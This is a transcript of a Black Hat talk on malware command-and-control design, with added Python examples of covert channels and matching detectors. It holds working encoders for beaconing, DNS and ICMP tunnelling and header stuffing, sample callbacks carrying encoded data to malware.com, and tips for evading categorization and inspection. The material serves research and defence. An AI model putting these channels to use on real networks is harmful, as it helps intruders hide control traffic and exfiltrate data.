flying a false flag - i.blackhat.com · [ agenda ] c2 methodology techniques and theory c2 channels...
TRANSCRIPT
![Page 1: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/1.jpg)
Flying A False Flag
Advanced C2, Trust Conflicts, and Domain Takeover
[ bio ]
Nick Landers : @monoxgas
Technical Lead,
Silent Break Security
▪ Research & Development
▪ Offensive Operations
▪ Consulting
▪ Dark Side Ops
▪ Shellcode RDI (sRDI)
▪ Red Team Toolkit (RTT)
[ agenda ]
▪ C2 Methodology
  ▪ Techniques and Theory
▪ C2 Channels
  ▪ Classic and Modern
▪ Trust Conflicts
  ▪ Existing and Fresh
▪ Cloud Abuse & Takeover
  ▪ The death of an IP
▪ Final Thoughts
command & control
[ software model ]
(figure: Client ↔ Perimeter ↔ Server)
▪ Channel Selection
▪ Redundancy
▪ Obfuscation
▪ Serialization
▪ Encryption
▪ Trust
[ malware model ]
(figure: Implant ↔ Perimeter ↔ LP (listening post); the same six concerns as the software model)
▪ Channel Selection
▪ Redundancy
▪ Obfuscation
▪ Serialization
▪ Encryption
▪ Trust
[ define: c2 ]
LP side
  User Input      | "upload file.ext"
  Parsing & Prep  | fdata = read(file.ext)
  Serialization   | 0x42 0xFF 0x42 0x54
Channel
  Data Transfer   | page?id=AABDlwIEjrl
Implant side
  Deserialization | 0x42 0xFF 0x42 0x54
  Execution       | write(fdata)
(on the slide the pipeline is bracketed as LP, C2 and Implant)
[ methodology ]
C2 = Technique [strategy of execution] + Channel [medium for communication]
[ technique ]
(figure: Implant ↔ LP)
▪ Orientation
▪ Interval
▪ Distribution
▪ Failover
▪ Routing

[ technique ] Orientation: "Reverse"
(figure: Implant → LP; the implant initiates the connection)

[ technique ] Orientation: "Bind"
(figure: Operator → Implant; the operator connects in to a listening implant)
[ implementation - solicitation ]
(figure: Attacker sends Tasking, Victim processes it and returns Results, repeated along a time axis)
Traits: Efficient | Attribution | Conditional
Examples: knocking, web shells, bind shells
[ technique ]
Implant
Server
“Beacon”
▪ Orientation
▪ Interval
▪ Distribution
▪ Failover
▪ Routing
![Page 17: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/17.jpg)
[ technique ]
Implant
Server
“Shell”
▪ Orientation
▪ Interval
▪ Distribution
▪ Failover
▪ Routing
[ implementation - beaconing ]
(figure: Victim polls the LP for Tasking, processes it, returns Results, repeated along a time axis)
Traits: Consistent | Simple | Inefficient | Action Delay
Examples: web transports, basic agents
[ implementation – long polling ]
(figure: Victim asks for Tasking and the LP holds the thread, 15s then 30s in the example, answering as soon as tasking exists; Results returned along a time axis)
Traits: Responsive | Efficient | Conditional | Obscure
[ technique ] Distribution / Failover
(figure, two build-up slides: one Implant, three listening posts A, B, C)
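The interval, distribution and failover axes above, worked as an added example in Python (not code from the talk or from Silent Break's tooling). The listening-post names and the transport callback are placeholders; in practice the transport is one of the channels covered in the next section.

```python
"""Beacon technique: interval with jitter, an ordered LP list, and failover.

Added example for the technique slides; not code from the talk. LP names and
the transport callback are placeholders (assumptions).
"""
import random


class Beacon:
    """Reverse-orientation beacon: the implant initiates every contact."""

    def __init__(self, lps, transport, interval=60.0, jitter=0.2,
                 max_failures=3, rng=None):
        self.lps = list(lps)            # distribution: listening posts, tried in order
        self.transport = transport      # callable(lp) -> tasking bytes; raises OSError on failure
        self.interval = interval        # base delay between callbacks, seconds
        self.jitter = jitter            # fraction of the interval to randomise
        self.max_failures = max_failures
        self.rng = rng or random.Random()
        self.active = 0                 # index of the LP currently in use
        self.failures = 0               # consecutive failures against that LP

    def current_lp(self):
        return self.lps[self.active]

    def next_delay(self):
        """Interval +/- jitter, so the callback cadence is not a fixed period."""
        return self.interval * (1.0 + self.rng.uniform(-self.jitter, self.jitter))

    def check_in(self):
        """One callback. Returns tasking bytes, or None if this attempt failed.

        After max_failures consecutive failures the beacon rotates to the next
        LP in the list (wrapping around): the failover axis from the slide.
        """
        try:
            tasking = self.transport(self.current_lp())
        except OSError:
            self.failures += 1
            if self.failures >= self.max_failures:
                self.active = (self.active + 1) % len(self.lps)
                self.failures = 0
            return None
        self.failures = 0
        return tasking


def simulate(beacon, rounds):
    """Drive the beacon without sleeping; returns (lp tried, tasking, planned delay)."""
    log = []
    for _ in range(rounds):
        lp = beacon.current_lp()
        tasking = beacon.check_in()
        log.append((lp, tasking, round(beacon.next_delay(), 2)))
    return log


def demo_transport(lp):
    """Constructed transport: the first LP is dead, the others answer."""
    if lp == "lp-a.example":
        raise OSError("connect timeout")
    return b"sleep 300"


LPS = ["lp-a.example", "lp-b.example", "lp-c.example"]

if __name__ == "__main__":
    beacon = Beacon(LPS, demo_transport, interval=60, jitter=0.2, rng=random.Random(7))
    for entry in simulate(beacon, 5):
        print(entry)
```

Driving the beacon with simulate() instead of sleeping makes the failover behaviour testable: three consecutive transport errors against lp-a move the implant to lp-b, and every planned delay stays inside interval ± jitter. A real implant would also cap how far it rotates, so one bad network segment does not burn every LP in the list, and would remember which LP last answered.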
[ technique ] Routing
(figure: Implant → 3rd Party → LP)
(figure: Implant → Bastion → Bastion → LP)
(figure: Implant → 3rd Party → Operator)
[ implementation – dead drop ]
(figure: Attacker leaves Tasking with a 3rd Party; Victim fetches it and posts Results back to the 3rd Party, which the Attacker collects; time axis)
Traits: Stealth | Complexity | Action Delay
channels
[ sockets ]
implant → malware.com
  host : DESKTOP3 | os : win1903 | user : Admin | EOF
Responsive | Simple | Still Popular ("start simple®")

+ Encryption
  nqPMcmBWJbpS1Prb4aZA5wT7rKeXrX6YNiMrBeeMH6deHNWPNRFmdxEOF
+ SSL
+ Chunking
  nqPMcmBWJbpS1Prb4aEOF
  ZA5wT7rKeXrX6YNiMrEOF

What an Observer still sees, even with encryption, SSL and chunking:
1: Destination
2: Protocol
3: Volume
4: Perimeter
[ attacker priorities ]
1: Trust
  - Repositories (categorization, blacklists)
  - Takeover primitives
  - Piggybacking
2: Content
  - Masquerading (charset, frequency, volume)
3: Vector
  - Protocol and port + details
  - Orientation and architecture
  - Structure limitations
[ layers ]
Network | Transport | Session | Presentation | Application | …
"comp sci strikes back"
defensive coverage: ?
Application layer: HTTP, DNS, SMB, RDP, IMAP, LDAP, NFS, POP, SMTP, …
[ channel - http ]
GET /cb?info=aW9uZXNjdQ HTTP/1.1
User-Agent: Mozilla (Win64; x64)
Host: malware.com
Connection: Keep-Alive

▪ Common at the perimeter
▪ Layered on TCP - Reliability
▪ Complex dialect and usage
  ▪ Encoded binary data isn't rare
▪ Well supported in languages - Accessibility
[ channel - http + ]
POST /cb HTTP/1.1
User-Agent: Mozilla (Win64; x64)
Host: medicalwork.com
Authenticate: basic aW9uZXNjdQ
Connection: Keep-Alive

Content: Better masquerading
▪ Match/extract user-agent string
▪ Use POST requests for limited logging (proxies log the URL, rarely the body)
▪ Use "sensitive" domains – medical / banking
▪ Embed in special headers to avoid inspection
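The "embed in special headers" trick beside the check a proxy or log pipeline can run against it, as an added example in Python (not the talk's code). The slide writes the header as Authenticate; the credential header a browser actually sends is Authorization, which is what a masquerading implant would copy. The request values below are constructed and the thresholds are assumptions.

```python
"""Tasking hidden in an HTTP Basic credential, and a check that spots it.

Added example, not code from the talk or its PoCs. Sample values are
constructed; detector thresholds are illustrative assumptions.
"""
import base64
import binascii
import collections
import math


def encode_in_basic(payload: bytes) -> str:
    """Implant side: carry raw C2 bytes as an HTTP Basic credential.
    Proxies that log request lines and query strings never record this field."""
    return "Basic " + base64.b64encode(payload).decode("ascii")


def decode_basic(value: str) -> bytes:
    """LP side (and detector side): strip the scheme and base64-decode the token."""
    scheme, _, token = value.partition(" ")
    if scheme.lower() != "basic" or not token:
        raise ValueError("not a Basic credential")
    return base64.b64decode(token, validate=True)


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: ~8.0 for ciphertext, well under 5 for 'user:password' text."""
    if not data:
        return 0.0
    counts, n = collections.Counter(data), len(data)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def inspect_basic_auth(value: str, max_len: int = 128, max_entropy: float = 5.0) -> list:
    """Detector: a genuine Basic token decodes to printable 'user:password'.
    Returns the reasons the value looks like stuffed data (empty list = clean)."""
    try:
        raw = decode_basic(value)
    except (ValueError, binascii.Error):
        return ["undecodable credential"]
    reasons = []
    if b":" not in raw:
        reasons.append("no user:password separator")
    if any(c < 32 or c > 126 for c in raw):
        reasons.append("non-printable bytes")
    if len(raw) > max_len:
        reasons.append("oversized credential")
    if shannon_entropy(raw) > max_entropy:
        reasons.append("high entropy")
    return reasons


# Constructed samples: a normal login and a 64-byte 'encrypted' tasking blob.
SAMPLE_LOGIN = encode_in_basic(b"alice:hunter2")
SAMPLE_C2 = encode_in_basic(bytes(range(128, 192)))

if __name__ == "__main__":
    for label, value in (("login", SAMPLE_LOGIN), ("c2", SAMPLE_C2)):
        print(label, value[:24] + "...", inspect_basic_auth(value) or "clean")
```

A login token decodes to printable user:password text with entropy well under 5 bits per byte; ciphertext in the same field fails all three structural checks at once. The base64 blob in the info= query parameter on the previous slide can be scored the same way, which is one reason the slide prefers headers and POST bodies over URLs.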
[ channel - http domains ]
GET /cb?info=aW9uZXNjdQ HTTP/1.1
User-Agent: Mozilla (Win64; x64)
Host: wellknown.com
Connection: Keep-Alive

Trust: Domain names
▪ Domain categorization and masquerading
▪ Expired domains
  ▪ https://www.expireddomains.net/
  ▪ https://www.freshdrop.com/
  ▪ https://www.domcop.com
▪ Subdomain abuse – http://[attacker].trusted.com

Trust: Domain categorization (vendor lookup and recategorization portals)
▪ Palo Alto - https://urlfiltering.paloaltonetworks.com/TestASite.aspx
▪ McAfee - https://www.trustedsource.org/en/feedback/url
▪ Blue Coat - https://sitereview.bluecoat.com/sitereview.jsp
▪ zVelo - https://tools.zvelo.com
▪ Fortinet - http://url.fortinet.net/rate/submit.php
▪ Watchguard - https://www.watchguard.com/securityportal/UrlCategorization.aspx

Trust: Domain categorization, automated tooling
▪ https://github.com/mdsecactivebreach/Chameleon
▪ https://github.com/threatexpress/domainhunter
▪ https://github.com/GhostManager/DomainCheck
▪ https://github.com/Mr-Un1k0d3r/CatMyPhish
[ channel - http pipelining ]
GET /help HTTP/1.1
Host: benign.com

GET /cb?info=aW9uZXNjdQ HTTP/1.1
Host: malware.com

(figure: both requests on one socket, the benign request ahead of the callback)
Content: Reduce traffic volume
Trust: Add validity to your action space
▪ Can create benign traffic ahead of a callback
▪ Interesting alternative to domain fronting
▪ https://digi.ninja/blog/pipelining.php
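The two pipelined requests above as an added example in Python (not the digi.ninja code): building the byte stream that goes down one socket, and splitting the responses that come back in order. The response stream is constructed, so nothing is sent.

```python
"""HTTP/1.1 pipelining: a benign request and the callback on one TCP socket.

Added example, not from the talk. Hosts, paths and the response stream are
constructed; chunked transfer encoding is deliberately not handled.
"""


def build_pipeline(requests):
    """requests: iterable of (method, host, path, headers dict).
    Returns the bytes written to the socket in a single send(): each request
    is a complete HTTP/1.1 message and none waits for the previous response."""
    out = bytearray()
    for method, host, path, headers in requests:
        lines = [f"{method} {path} HTTP/1.1", f"Host: {host}"]
        lines += [f"{k}: {v}" for k, v in headers.items()]
        lines.append("Connection: keep-alive")
        out += ("\r\n".join(lines) + "\r\n\r\n").encode("ascii")
    return bytes(out)


def split_responses(stream):
    """Cut a stream of back-to-back responses at Content-Length boundaries.
    A server answers pipelined requests in the order received (RFC 7230,
    section 6.3.2), so response N belongs to request N and the second body
    here is the callback's tasking."""
    responses = []
    pos = 0
    while pos < len(stream):
        end = stream.index(b"\r\n\r\n", pos)
        status_line, *header_lines = stream[pos:end].decode("iso-8859-1").split("\r\n")
        headers = {}
        for line in header_lines:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        if "content-length" not in headers:
            raise ValueError("only Content-Length framed responses are supported")
        length = int(headers["content-length"])
        body_start = end + 4
        responses.append((status_line, headers, stream[body_start:body_start + length]))
        pos = body_start + length
    return responses


# Constructed: the two requests from the slide, and the responses a server
# honouring pipelining would send back, concatenated exactly as they arrive.
PIPELINE = build_pipeline([
    ("GET", "benign.com", "/help", {}),
    ("GET", "malware.com", "/cb?info=aW9uZXNjdQ", {"User-Agent": "Mozilla (Win64; x64)"}),
])
RESPONSE_STREAM = (
    b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: 12\r\n\r\n<p>help</p>\n"
    b"HTTP/1.1 200 OK\r\nContent-Type: text/plain\r\nContent-Length: 9\r\n\r\nsleep 300"
)

if __name__ == "__main__":
    print(PIPELINE.decode("ascii"))
    for status, headers, body in split_responses(RESPONSE_STREAM):
        print(status, headers.get("content-type"), body)
```

On a direct connection both requests reach whatever server the socket was opened to, so benign.com is cover in the logs only. Behind a forward proxy that honours pipelining each request is routed by its own Host header, which is the domain-fronting-like effect the slide points at. Browsers ship with HTTP/1.1 pipelining disabled and not every proxy supports it, so an implant should fall back to one request per connection when the second response never arrives.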
[ channel - http:websocket ]
GET /websocket HTTP/1.1
...
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Key: c2VrdXI...

Trust: Less inspection
Vector: Add speed + push/pull
▪ Gateway support may be limited
▪ https://github.com/xorrior/raven
▪ https://github.com/ryhanson/ExternalC2/
[ channel - http/2 ]
(figure: HEADERS frame, DATA frame, HEADERS frame)
Trust: Less inspection
Vector: Add speed + push/pull
▪ Gateway support is likely limited
▪ Transfer size reduction
▪ Binary support – "no more encoding!"
▪ https://github.com/Ne0nd0g/merlin
[ channel – dns ]
id : 1337 | type : A | qname : FEEDACDC.site.com
▪ Limited transfer size (a UDP response over 512 bytes without EDNS0 is truncated and retried over TCP)
  A    = ~125b out | 4b back
  AAAA = ~125b out | 16b back
  TXT  = ~125b out | ~190b back
▪ dnscat2¹ | PowerDNS | DNS-C2 | DNSExfiltrator | etc.
▪ Simple to detect² (volume, name length, unique subdomains)
¹ https://github.com/iagox86/dnscat2
² https://www.sans.org/reading-room/whitepapers/dns/detecting-dns-tunneling-34152
[ channel – dns + ]
id : 1337 | type : A | qname : FEEDACDC.site.com
▪ Blended C2 approach
  ▪ Use for heartbeats / logic transitions
  ▪ Transfer alternate C2 profiles / encryption keys
▪ DNS over HTTPS – DoHC2¹ | goDoH²
▪ Implement DNSSEC
▪ Trade throughput for trusted net blocks - 8.X.X.X (the perimeter sees only the public resolver)
¹ https://github.com/SpiderLabs/DoHC2
² https://github.com/sensepost/goDoH
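The capacity figures and the detection signals from the two DNS slides, as an added example in Python (not dnscat2 or any tool listed above). The carrier domain and the query log are constructed; the registered-domain split and the thresholds are assumptions noted in the code.

```python
"""DNS as a carrier: packing data into query names, and the detector side.

Added example, not from the talk or the tools it lists. Domain, query log
and thresholds are constructed / assumed.
"""
import base64
import collections

MAX_LABEL = 63    # RFC 1035: one label is at most 63 octets
MAX_NAME = 253    # longest name in presentation form


def encode_qnames(data: bytes, domain: str, seq_start: int = 0) -> list:
    """Implant side: split data into query names under `domain`.
    Base32 survives case folding by resolvers (names are case-insensitive);
    the first label is a hex sequence number so the LP can reorder queries."""
    text = base64.b32encode(data).decode("ascii").rstrip("=").lower()
    labels = [text[i:i + MAX_LABEL] for i in range(0, len(text), MAX_LABEL)]
    names, seq = [], seq_start
    while labels:
        current = [f"{seq:04x}"]
        while labels and len(".".join(current + [labels[0], domain])) <= MAX_NAME:
            current.append(labels.pop(0))
        if len(current) == 1:
            raise ValueError("domain too long to carry a data label")
        names.append(".".join(current + [domain]))
        seq += 1
    return names


def decode_qnames(names: list, domain: str) -> bytes:
    """LP side: strip the domain, order by sequence label, base32-decode."""
    chunks = {}
    for name in names:
        labels = name[:-(len(domain) + 1)].split(".")
        chunks[int(labels[0], 16)] = "".join(labels[1:])
    text = "".join(chunks[k] for k in sorted(chunks)).upper()
    return base64.b32decode(text + "=" * (-len(text) % 8))


def registered_domain(qname: str) -> str:
    """Last two labels. Assumption for the example; real tooling uses the
    public suffix list so that host.example.co.uk groups correctly."""
    return ".".join(qname.rstrip(".").split(".")[-2:])


def score_domains(qnames, max_unique: int = 50, max_mean_len: float = 60.0) -> dict:
    """Detector: per registered domain, unique-name count and mean name length,
    the two signals the slide lists beside raw volume. Thresholds are illustrative."""
    by_domain = collections.defaultdict(list)
    for q in qnames:
        by_domain[registered_domain(q)].append(q)
    findings = {}
    for dom, qs in by_domain.items():
        unique, mean_len = len(set(qs)), sum(map(len, qs)) / len(qs)
        reasons = []
        if unique > max_unique:
            reasons.append(f"{unique} unique subdomains")
        if mean_len > max_mean_len:
            reasons.append(f"mean name length {mean_len:.0f}")
        if reasons:
            findings[dom] = reasons
    return findings


# Constructed query log: ordinary lookups plus one implant pushing 512 bytes out.
TUNNEL_DOMAIN = "site.com"
SECRET = bytes(range(256)) * 2
QUERY_LOG = ["www.example.com"] * 20 + ["mail.example.com"] * 5 \
    + encode_qnames(SECRET, TUNNEL_DOMAIN)

if __name__ == "__main__":
    names = encode_qnames(SECRET, TUNNEL_DOMAIN)
    print(len(names), "queries, first:", names[0][:60] + "...")
    print(score_domains(QUERY_LOG))
```

With an 8-character carrier domain each query name holds three 63-character base32 labels, about 118 raw bytes, which is where the slide's ~125 bytes out comes from; the return path is still 4 bytes per A record. The same scoring shows why the "dns +" slide relegates DNS to heartbeats and key transfer: a handful of short, infrequent queries look like ordinary traffic, while bulk transfer pushes mean name length far past anything legitimate.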
[ layers ]
Network | Transport | Session | Presentation | Application | …
Lower-layer carriers: TCP, ICMP, UDP, MTCP
[ channel - icmp ]
type : 8 (echo req) | id : 123 | seq : 456 | payload : nqPMcmBWJbpS...
▪ Arbitrary payload size
▪ Simple development
▪ Popular in the wild¹ ²
▪ Simple to detect (entropy, mismatched request/reply payloads, size)
¹ https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-trojan-uses-icmp-packets-to-send-data/
² https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Symantec_Remsec_IOCs.pdf
[ channel - icmp + ]
type : 11 (time exceeded) | [ unused [32] ] [ packet [32] ]
▪ Alternative message types (timestamp, extended echo, etc.)
▪ Smaller payloads with more volume
▪ Traditional echo requests for heartbeats
▪ Binary lookup tables – single byte flags
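Both ICMP slides as an added example in Python (not from the talk or the cited reports): an echo carrier, the type 11 variant with data in the "original datagram" field, and the entropy / mismatch / size checks. Packets are built and inspected as bytes; nothing is sent, since raw ICMP sockets need administrator rights. The ping payload constant is the well-known one the Windows ping utility uses; thresholds are assumptions.

```python
"""ICMP echo as a carrier, the type 11 variant, and the checks that expose it.

Added example, not from the talk. Traffic below is constructed; thresholds
are illustrative assumptions.
"""
import collections
import math
import struct

ECHO_REPLY, ECHO_REQUEST, TIME_EXCEEDED = 0, 8, 11
# The 32-byte payload the Windows ping utility sends (well-known constant).
PING_PAYLOAD = b"abcdefghijklmnopqrstuvwabcdefghi"


def icmp_checksum(data: bytes) -> int:
    """RFC 1071 ones'-complement sum over 16-bit big-endian words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def build_echo(icmp_type: int, ident: int, seq: int, payload: bytes) -> bytes:
    """Type 8/0 message: header (type, code, checksum, id, seq) + payload."""
    header = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq)
    csum = icmp_checksum(header + payload)
    return struct.pack("!BBHHH", icmp_type, 0, csum, ident, seq) + payload


def build_time_exceeded(quoted: bytes) -> bytes:
    """Type 11 message: 4 unused bytes, then the 'original datagram' field,
    which a carrier fills with arbitrary bytes instead of a real IP header."""
    header = struct.pack("!BBHI", TIME_EXCEEDED, 0, 0, 0)
    csum = icmp_checksum(header + quoted)
    return struct.pack("!BBHI", TIME_EXCEEDED, 0, csum, 0) + quoted


def parse_icmp(packet: bytes) -> dict:
    """Common 8-byte header; the checksum over the whole message is 0 when intact."""
    icmp_type, code, _, rest = struct.unpack("!BBHI", packet[:8])
    return {"type": icmp_type, "code": code, "checksum_ok": icmp_checksum(packet) == 0,
            "id": rest >> 16, "seq": rest & 0xFFFF, "payload": packet[8:]}


def shannon_entropy(data: bytes) -> float:
    if not data:
        return 0.0
    n, counts = len(data), collections.Counter(data)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def inspect_pair(request: bytes, reply: bytes, max_payload: int = 128,
                 max_entropy: float = 6.0) -> list:
    """Detector for one echo request/reply pair: the three signals from the
    slide. Entropy is only meaningful above a few dozen bytes, so that check
    is skipped for short payloads."""
    req, rep = parse_icmp(request), parse_icmp(reply)
    reasons = []
    if len(req["payload"]) > max_payload:
        reasons.append("oversized payload")
    if len(req["payload"]) >= 64 and shannon_entropy(req["payload"]) > max_entropy:
        reasons.append("high-entropy payload")
    if rep["payload"] != req["payload"]:
        reasons.append("reply does not echo the request payload")
    return reasons


# Constructed traffic: one normal ping exchange and one tunnelled exchange.
NORMAL = (build_echo(ECHO_REQUEST, 1, 1, PING_PAYLOAD),
          build_echo(ECHO_REPLY, 1, 1, PING_PAYLOAD))
TUNNEL = (build_echo(ECHO_REQUEST, 1, 2, bytes(range(256))),
          build_echo(ECHO_REPLY, 1, 2, bytes(range(255, -1, -1))))

if __name__ == "__main__":
    print("normal:", inspect_pair(*NORMAL) or "clean")
    print("tunnel:", inspect_pair(*TUNNEL))
```

A genuine reply must echo the request's data, so an LP that answers an echo request with tasking instead of the original payload trips the mismatch check on its own. Carriers that keep the reply honest and move tasking into separate messages survive that check and are caught by size and entropy instead, which is the trade-off behind the "smaller payloads with more volume" bullet.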
[ channel - nat punch ]
▪ Demonstrated in pwnat/chownat by Samy Kamkar¹
▪ Used to learn IP address for UDP NAT bypass
▪ Can invert traffic orientation
¹ https://samy.pl/pwnat/
(figure: a type 8 echo request is sent to 1.2.3.4; a type 11 time exceeded carrying [ echo req to 1.2.3.4 ] comes back through the NAT)
trust conflicts
[ trusted assets ]
▪ Communication [ e-mail | chat | social ]
▪ Operations [ b2b | saas | internal | etc ]
▪ Security [ vendors | trust repos ]
▪ Generally Dead-Drop systems
▪ Provide Inherent Stealth
  ▪ Perimeter exclusions
  ▪ SIEM whitelisting
  ▪ Analyst evasion
[ trusted abuse ]
▪ Communication [ e-mail | chat | social ]
▪ Operations [ b2b | saas | internal | etc ]
▪ Security [ vendors | trust repos ]
▪ Twitter : twittor¹ | ROKRAT²
▪ Multi-Site : HAMMERTOSS³ | Social-media-c2⁴
¹ https://github.com/PaulSec/twittor
² https://blog.talosintelligence.com/2017/04/introducing-rokrat.html
³ https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf
⁴ https://github.com/woj-ciech/Social-media-c2
[ trusted abuse ]
▪ Communication [ e-mail | chat | social ]
▪ Operations [ b2b | saas | internal | etc ]
▪ Security [ vendors | trust repos ]
▪ Slack : SlackShell¹ | c2s² | slack-c2bot³
▪ Skype : skype-dev-bots⁴ ?
¹ https://github.com/bkup/SlackShell
² https://github.com/j3ssie/c2s
³ https://github.com/praetorian-code/slack-c2bot
⁴ https://github.com/microsoft/skype-dev-bots
[ trusted abuse ]
▪ Communication [ e-mail | chat | social ]
▪ Operations [ b2b | saas | internal | etc ]
▪ Security [ vendors | trust repos ]
▪ Gmail : Gcat¹ | Gdog²
▪ Exchange : ESET LightNeuron³
¹ https://github.com/byt3bl33d3r/gcat
² https://github.com/maldevel/gdog
³ https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf
[ poc - postoffice ]
▪ Account piggybacking
▪ SendGrid for server transit
▪ Data stuffing in X-Header
▪ Rule to auto-hide messages
▪ Credential reuse via WinInet + Vault
(ASCII-art banner: "postoffice")
EWS Mail C2 - Proof of Concept

[ poc - postoffice ]
(figure: Victim ↔ Exchange:EWS, SendGrid ↔ Attacker)
1 Pull endpoint settings and credentials
2 Configure the auto-hide rule
3 Send E-Mail C2 in X-Header
4 Inbound webhook forwards content

[ poc - postoffice ]
(screenshot slide; no extractable text)

[ poc - postoffice ]
[ insert demo here ]
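The X-header stuffing step of the PoC (step 3 above), as an added example in Python using only the standard library. This is not the postoffice code: the EWS pull, the auto-hide rule and the SendGrid webhook are not reproduced, and the header name, addresses and payload are constructed.

```python
"""Data stuffing in mail X-headers, the transport step of the postoffice PoC.

Added example, not the PoC's code. Header name, addresses and payload are
constructed; the gateway threshold is an assumption.
"""
import base64
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser

HEADER = "X-Correlation-Data"   # assumption: any innocuous custom header name will do
CHUNK = 56                      # keeps 'Name: value' under the 78-column fold limit


def stuff(payload: bytes, sender: str, recipient: str) -> bytes:
    """Build an ordinary-looking message whose custom header carries the payload.
    Base64 is split across repeated headers so no line needs RFC 5322 folding
    and relays pass it through untouched."""
    msg = EmailMessage(policy=policy.SMTP)
    msg["From"], msg["To"], msg["Subject"] = sender, recipient, "Weekly report"
    msg.set_content("Please find the report attached.")
    text = base64.b64encode(payload).decode("ascii")
    for i in range(0, len(text), CHUNK):
        msg[HEADER] = text[i:i + CHUNK]      # repeated header, one chunk each
    return msg.as_bytes()


def unstuff(raw: bytes) -> bytes:
    """Receiving side (the inbound webhook in the PoC): reassemble the chunks."""
    msg = BytesParser(policy=policy.SMTP).parsebytes(raw)
    return base64.b64decode("".join(msg.get_all(HEADER, [])))


def x_header_bytes(raw: bytes) -> int:
    """Gateway check: how many bytes a message carries in custom X- headers.
    Ordinary mail carries at most a few hundred; the cut-off is a tuning choice."""
    msg = BytesParser(policy=policy.SMTP).parsebytes(raw)
    return sum(len(v) for k, v in msg.items() if k.lower().startswith("x-"))


# Constructed sample: 300 bytes of 'tasking' between two made-up addresses.
TASKING = bytes(range(256)) + bytes(range(44))
RAW = stuff(TASKING, "alice@corp.example", "bob@corp.example")

if __name__ == "__main__":
    print(RAW.decode("ascii"))
    print("round trip ok:", unstuff(RAW) == TASKING, "| X- bytes:", x_header_bytes(RAW))
```

Splitting the base64 across repeated headers keeps every line under the 78-column fold limit, so no relay has to re-fold or re-encode it and the webhook gets the chunks back in order. The byte counter is the matching gateway check: a per-message budget on custom header bytes flags this transport without parsing any body, which matters because the auto-hide rule keeps the message out of the user's view entirely.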
[ trusted abuse ]
▪ Communication [ e-mail | chat | social ]
▪ Operations [ b2b | saas | internal | etc ]
▪ Security [ vendors | trust repos ]
▪ Office 365 : MWR Labs¹
▪ GitHub : canisrufus²
▪ Google Drive : DarkHydrus³
¹ https://labs.mwrinfosecurity.com/blog/tasking-office-365-for-cobalt-strike-c2
² https://github.com/maldevel/canisrufus
³ https://unit42.paloaltonetworks.com/darkhydrus-delivers-new-trojan-that-can-use-google-drive-for-c2-communications/
[ trusted abuse ]
▪ Communication [ e-mail | chat | social ]
▪ Operations [ b2b | saas | internal | etc ]
▪ Security [ vendors | trust repos ]
▪ Active Directory : harmj0y¹
▪ MSSQL : PowerUpSQL / NetSPI²
▪ File Shares : outflank³
¹ https://www.harmj0y.net/blog/powershell/command-and-control-using-active-directory/
² https://blog.netspi.com/databases-and-clouds-sql-server-as-a-c2/
³ https://outflank.nl/blog/2017/09/17/blogpost-cobalt-strike-over-external-c2-beacon-home-in-the-most-obscure-ways/
![Page 67: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/67.jpg)
[ trusted abuse ]
▪ Communication [ e-mail | chat | social]
▪ Operations [ b2b | saas | internal | etc ]
▪ Security [ vendors | trust repos ]
▪ Wikipedia : wikipedia-c21
▪ Pastebin : Aggah Campaign2
1 https://github.com/daniel-infosec/wikipedia-c22 https://unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/
![Page 68: Flying a False Flag - i.blackhat.com · [ agenda ] C2 Methodology Techniques and Theory C2 Channels Classic and Modern Trust Conflicts Existing and Fresh Cloud Abuse & Takeover](https://reader030.vdocuments.net/reader030/viewer/2022041300/5e0fde64e40f7f2da0560734/html5/thumbnails/68.jpg)
[ trusted abuse ]
▪ Communication [ e-mail | chat | social]
▪ Operations [ b2b | saas | internal | etc ]
▪ Security [ vendors | trust repos ] ?
[ poc - addendum ]
▪ Stuffs data into office document properties
▪ Tracks sample uploads using comments
▪ Handles large payloads gracefully (1MB+)
▪ Ideal for static stages / downloads
VirusTotal C2 - Proof of Concept
[ poc - addendum ]
Flow between Victim, Attacker and VirusTotal:
1. Pack callback data in an office document
2. Upload sample for analysis
3. Tag/identify the file using comments
4. Extract callback from the web response
[ poc - addendum ]
[ insert demo here ]
cloud abuse & takeover
[ the “cloud” ]
AWS 47% | Azure 22% | Alibaba 8% | GCP 7% (84% combined)
▪ Lots of functionality – opportunity for abuse, but we’ll stay focused on C2 primitives:
▪ CDN endpoints
▪ Serverless architectures
▪ File hosting
▪ Message queues
▪ VPNs
[ the “issue” ]
Trust boundaries | Dynamic assets
[diagram labels: Client, Server]
[diagram labels: Implant, LP, Trust Repository, perimeter]
[diagram labels: Implant, LP, msn, ?, perimeter]
Hostnames that all live on shared cloud or CDN infrastructure:
uploads.azurewebsites.net
myresume.appspot.com
recruiter.amazonaws.com
meetings.blob.core.windows.net
security.cloudfront.net
reports.akamai.net
updates.akamaiedge.net
cdn.kunlungr.com
▪ How will TLS scale with the cloud?
▪ How does DNS cope with reallocation?
